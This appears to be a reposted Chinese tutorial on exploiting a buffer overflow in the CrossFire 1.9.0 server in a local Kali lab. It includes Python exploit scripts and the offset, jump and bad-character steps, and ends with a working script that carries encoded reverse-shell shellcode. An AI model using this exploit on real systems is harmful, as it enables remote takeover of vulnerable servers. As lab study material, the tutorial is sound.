2. 程式人生 > >Linux下簡單的緩沖區溢出

Linux下簡單的緩沖區溢出

阿新 發佈:2018-06-30
斷點 lose spl xca bsp IT stat shel 精準

緩沖區溢出是什麽?

科班出身,或者學過匯編的應該知道,當緩沖區邊界限制不嚴格時,由於變量傳入畸形數據或程序運行錯誤,導致緩沖區被“撐爆”,從而覆蓋了相鄰內存區域的數據

成功修改內存數據,可造成進程劫持,執行惡意代碼,獲取服務器控制權等後果

CrossFire

  • 多人在線RPG遊戲
  • 1.9.0 版本接受入站 socket 連接時存在緩沖區溢出漏洞 (服務端)

調試工具

  • edb

運行平臺

  • kali 2.0 x64虛擬機

Linux中內存保護機制

  • DEP
  • ASLR
  • 堆棧 cookies
  • 堆棧粉碎

漏洞太老,避免測試中我們的虛擬機被劫持,可以通過iptables設置目標端口只允許本地訪問,如果網絡是僅主機可以省略

#4444端口是一會開放的測試端口,只允許本地訪問
iptables -A INPUT -p tcp --destination-port 4444 \! -d 127.0.0.1 -j DROP

#13327是服務端端口,只允許本地訪問
iptables -A INPUT -p tcp --destination-port 13327 \! -d 127.0.0.1 -j DROP

創建/usr/games/目錄,將crossfire1.9.0服務端解壓到目錄

#解壓
touch /usr/games/
cd /usr/games/
tar zxpf crossfire.tar.gz

運行一下crossfire看看有沒有問題 ./crossfire

技術分享圖片

出現Waiting for connections即可,有問題看看Error

#開啟調試
edb --run /usr/games/crossfire/bin/crossfire

技術分享圖片

右下角是paused暫停狀態

菜單欄 Debug => Run(F9) 點擊兩回可以運行起來

可以通過命令查看程序端口信息

#查看開放端口
netstat -pantu | grep 13327

EIP中存放的是下一條指令的地址

這個程序和一般的溢出不同,它必須發送固定的數據量才可以發生溢出,而不是大於某個數據量都可以,我們構造如下python程序測試

#! /usr/bin/python
import
 
 socket
host = "127.0.0.1"
crash = "\x41" * 4379       ## \x41為十六進制的大寫A
buffer = "\x11(setup sound " + crash + "\x90\x00#"   ## \x90是NULL,\x00是空字符
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
s.connect((host,13327))
data = s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*]Payload Sent!"

運行後,edb報錯如下技術分享圖片

意思是EIP(存放一下條執行命令的地址)已經被覆蓋成上圖黑體中的地址,而計算機找不到這個地址。這個地址正是由我們輸入的A,說明EIP可控,存在溢出。

這裏你也可以測試增加一個A或者減少一個A發送,會發現後邊兩個數值都不是A,都不可控,也就是說數據量只有為4379時EIP才完全可控

為了查看到底是哪個位置的A才是溢出後的EIP地址,借助工具生成唯一字符串

cd /usr/share/metasploit-framework/tools/exploit/
./pattern_create.rb -l 4379

技術分享圖片

復制下來,構造如下python腳本

#! /usr/bin/python
import socket
host = "127.0.0.1"
crash = "唯一字符串"
buffer = "\x11(setup sound " + crash + "\x90\x00#"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
s.connect((host,13327))
data = s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*]Payload Sent!"

開啟edb啟動程序,運行python程序

技術分享圖片

利用工具確認字符串的位置

cd /usr/share/metasploit-framework/tools/exploit/
./pattern_offset.rb -q 46367046

技術分享圖片

就是說EIP地址前面有4368個字符。 4369,4370,4371,4372的位置存放的是溢出後的EIP地址

我們構造如下python腳本驗證

#! /usr/bin/python
import socket
host = "127.0.0.1"
crash = A*4368 + B*4 + C*7   ## 湊夠4379個字符
buffer = "\x11(setup sound " + crash + "\x90\x00#"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
s.connect((host,13327))
data = s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*]Payload Sent!"

技術分享圖片

可以看到EIP地址被精準的填充為B字符

技術分享圖片

右鍵ESP,選擇 Follow In Dump 查看數據

技術分享圖片

因為必須是精確的字符才能溢出,就是說ESP寄存器只能存放7個字符,顯然無法存放shellcode

幾個寄存器都查看後,選擇了EAX。因為EAX存放的是我們之前發送的幾千個A,是可控的,且有足夠的大小存放shellcode

技術分享圖片

思路就是讓EIP存放EAX的地址,然後在地址上加12,直接從第一個A的位置開始執行。但是各個機器的EAX的地址也各不相同,不具有通用性,所以直接跳轉的思路就放棄。

既然ESP可以存放7個字符,想到了跳轉EAX並偏移12

技術分享圖片

構造如下python代碼運行

#! /usr/bin/python
import socket
host = "127.0.0.1"
crash = A*4368 + B*4 + \x83\xc0\x0c\xff\xe0\x90\x90
buffer = "\x11(setup sound " + crash + "\x90\x00#"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
s.connect((host,13327))
data = s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*]Payload Sent!"

首先EIP地址仍然是精準的四個B

技術分享圖片

ESP => Follow In Dump 查看

技術分享圖片

83 c0 0c ff e0 90 90 說明這裏也完美寫入

思路就是EIP => ESP => EAX,EAX存放shellcode,因為ESP地址不固定,需要借助固定的地址跳轉

打開edb,菜單欄 Plugins => OpcodeSearcher => OpcodeSearch

選擇crossfire程序,ESP -> EIP,選擇一個jmp esp 的地址,這個地址是不會變的

技術分享圖片

菜單欄 plugin => breakpointmanager => breakpoints 選擇add增加我們上邊選擇的地址的斷點用來測試。

然後我們測試壞字符,經過測試壞字符是\x00\x0a\x0d\x20

生成shellcode並過濾壞字符

cd /usr/share/framework2/
./msfpayload -l                        #可以生成的shellcode的種類
./msfpayload linux_ia32_reverse LHOST=127.0.0.1 LPORT=4444 R | ./msfencode -b "\x00\x0a\x0d\x20"

構建python腳本

#!/usr/bin/python
import socket
host = "127.0.0.1"
shellcode = (
"\xbb\x6d\x65\x9b\xcd\xdb\xdd\xd9\x74\x24\xf4\x5f\x2b\xc9"+
"\xb1\x14\x83\xc7\x04\x31\x5f\x10\x03\x5f\x10\x8f\x90\xaa"+
"\x16\xb8\xb8\x9e\xeb\x15\x55\x23\x65\x78\x19\x45\xb8\xfa"+
"\x01\xd4\x10\x92\xb7\xe8\x85\x3e\xd2\xf8\xf4\xee\xab\x18"+
"\x9c\x68\xf4\x17\xe1\xfd\x45\xac\x51\xf9\xf5\xca\x58\x81"+
"\xb5\xa2\x05\x4c\xb9\x50\x90\x24\x85\x0e\xee\x38\xb0\xd7"+
"\x08\x50\x6c\x07\x9a\xc8\x1a\x78\x3e\x61\xb5\x0f\x5d\x21"+
"\x1a\x99\x43\x71\x97\x54\x03")

crash = shellcode + "A"*(4368-105) + "\x97\x45\x13\x08" + "\x83\xc0\x0c\xff\xe0\x90\x90"
buffer = "\x11(setup sound " +crash+ "\x90\x90#)"
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
print "[*]Sending evil buffer..."
s.connect((host,13327))
data = s.recv(1024)
print data
s.send(buffer)
s.close()
print "[*]Payload Sent!"

監聽本地的4444端口,即可獲取一個shell

Linux下簡單的緩沖區溢出

相關推薦

Linux簡單

斷點 lose spl xca bsp IT stat shel 精準 緩沖區溢出是什麽? 科班出身,或者學過匯編的應該知道,當緩沖區邊界限制不嚴格時,由於變量傳入畸形數據或程序運行錯誤,導致緩沖區被“撐爆”,從而覆蓋了相鄰內存區域的數據 成功修改內存數據,可造成進程劫持,

windows簡單之slmail

經典 問題 shell ever 圖片 ttl 0x0d orm 設置斷點 緩沖區溢出是什麽? 當緩沖區邊界限制不嚴格時,由於變量傳入畸形數據或程序運行錯誤,導致緩沖區被“撐暴”,從而覆蓋了相鄰內存區域的數據 成功修改內存數據,可造成進程劫持,執行惡意代碼,獲取服務器控制權

【安全牛學習筆記】Linux

信息安全;security+;Linux緩沖區溢出FUZZING Crossfire 1.9.0版本接受入展socket連接時攢在緩沖區溢出漏洞 調試工具 edb運行平臺Kali i486虛擬機 [email protected]:~

使用Linux進行實驗的配置記錄

log 安全 執行權限 .org tac cnblogs fail ont 指令   在基礎的軟件安全實驗中,緩沖區溢出是一個基礎而又經典的問題。最基本的緩沖區溢出即通過合理的構造輸入數據,使得輸入數據量超過原始緩沖區的大小,從而覆蓋數據輸入緩沖區之外的數據,達到諸如修改函

Kali學習筆記33:Linux系統實驗

目標 x11 們的 mage 意義 查看 二進制 無法 linu 之前做過一個Windows應用SLmail的緩沖區溢出的實驗 這次來做一個Linux平臺的緩沖區溢出實驗: 緩沖區溢出是什麽? 學過匯編的應該知道,當緩沖區邊界限制不嚴格時,由於變量傳入畸形數據或程序運行錯誤

簡單

jmp指令 高級 too ket 指令 生成 切換 mail 說我 作者:Joe 二進制,計算機才可以理解的低級語言,簡單來說它是一種信號,用電信號為例,0就是斷電,而1就是有電,這樣子010101有規律的閃就是我們的二進制了。看到這裏你應該會想,都9102年了

CSAPP lab3 bufbomb-攻擊實驗()bang boom kaboom

span tag eval nor %x put app test 以及 這裏先給出getbuf的反匯編代碼和棧結構,方便下面的使用。 棧結構: 第3關:bang 構造攻擊字符串作為目標程序輸入,造成緩沖區溢出,使目標程序能夠執行bang

內存 system ron article 數據包 解決 動態分配 語言 fan 原理:通過往程序的緩沖區寫超出其長度的內容,造成緩沖區的溢出,從而破壞程序的堆棧,造成程序崩潰或使程序轉而執行其它指令,以達到攻擊的目的。造成緩沖區溢出的原因是程序中沒有仔細檢查用戶輸入的參數

如何處理Android中的防技術

libc 針對 div padding border gin 圖1 netd stdlib.h 【51CTO專稿】本文將具體介紹Android中的防緩沖區溢出技術的來龍去脈。 1、什麽是ASLR? ASLR(Address space layout random

攻擊

棧幀 變量 圖片 位置 全局 使用 c語言 百度百科 隨機化 圖片來源:http://blog.csdn.net/u010651541/article/details/49849557 主要根據此圖給出一些程序變量的分配情況,以及緩沖區溢出攻擊的簡單原理。 上述圖主要描述

【安全牛學習筆記】

security+ 信息安全 linux 數據與代碼邊界不清,導致程序執行代碼腳本:#! /bin/bashecho $1在終端中運行腳本,參數寫;或|加上命令,會被系統執行 源碼審計 逆向工程 對編譯後的文件反匯編 模糊測試 安裝包,對程序發送數值,監視反饋SLmail 安裝後開放110,

(原創)攻擊方式學習之(3) - (Buffer Overflow)

信息 進行 adding 操作 return 錯誤 com 兩個 it! 堆棧溢出 堆棧溢出通常是所有的緩沖區溢出中最容易進行利用的。了解堆棧溢出之前,先了解以下幾個概念: 緩沖區 簡單說來是一塊連續的計算機內存區域,可以保存相同數據類型的多個實例。 堆棧

2017-2018-2 20179215《網絡攻防實踐》seed實驗

程序 byte UC inux 最大 切換 guard RR 註意 seed緩沖區溢出實驗 有漏洞的程序: /* stack.c */ /* This program has a buffer overflow vulnerability. */ /* Our task i

2017-2018-2 20179205《網絡攻防技術與實踐》第十周作業 攻防研究

崩潰 exe 第十周 此外 root權限 計算 進制 close bind 《網絡攻防技術與實踐》第十周作業 緩沖區溢出攻防研究 一、實驗簡介 緩沖區溢出是指程序試圖向緩沖區寫入超出預分配固定長度數據的情況。這一漏洞可以被惡意用戶利用來改變程序的流控制,甚至執行代碼的任意

5m21d學習筆記

緩沖區溢出 開啟 測試平臺 password ech 撒旦 TP 題目 github mysql鏈接字符串函數 concat(str1,str2) concat_ws(separator,str1,str2....) group_concat(str1,str2....)

windows

pause 匯編語言 shell rec 親測 .so microsoft asp ram 寫的不好多加指教 準備環境: 攻機:Kali 2.0 靶機:windows xp ,windows2003不能做這個實驗,親測好多次沒成功。有興趣可以試試 軟件:SLMail、im

20165317 寧心宇 實驗

lin 截圖 機制 初始配置 方便 inux .sh 添加 攻擊 20165317 寧心宇 緩沖區溢出實驗 內容: 在自己的電腦中完成https://www.shiyanlou.com/courses/231緩沖區溢出漏洞實驗 實驗 實驗步驟: 一、實驗的準備 實驗樓提供

20165315 漏洞實驗

x64 功能 ram bubuko int protect lib 但是 spa 20165315 緩沖區溢出漏洞實驗 一、實驗簡介 緩沖區溢出是指程序試圖向緩沖區寫入超出預分配固定長度數據的情況。這一漏洞可以被惡意用戶利用來改變程序的流控制,甚至執行代碼的任意片段。這一

20165318 漏洞實驗

-i size bad $0 一個 3.3 困難 shell dev 20165318 緩沖區溢出漏洞實驗 目錄 一、實驗簡介 二、實驗準備 三、實驗步驟 3.1初始設置 3.2shellcode 3.3漏洞程序 3.4攻擊程序 3.5攻擊結果 四、練習 五、參考資料

2018-2019-1 20165334《信息安全系統設計基礎》第三周學習總結及漏洞實驗

過程 信息安全 截圖 分享圖片 進入 種類 系統 xxx img 2018-2019-1 20165334《信息安全系統設計基礎》第三周學習總結及緩沖區溢出漏洞實驗 一、指令學習 gcc -Og -o xxx.c學習 -Og會告訴編譯器使用會生成符合原始c語言代碼的整體結構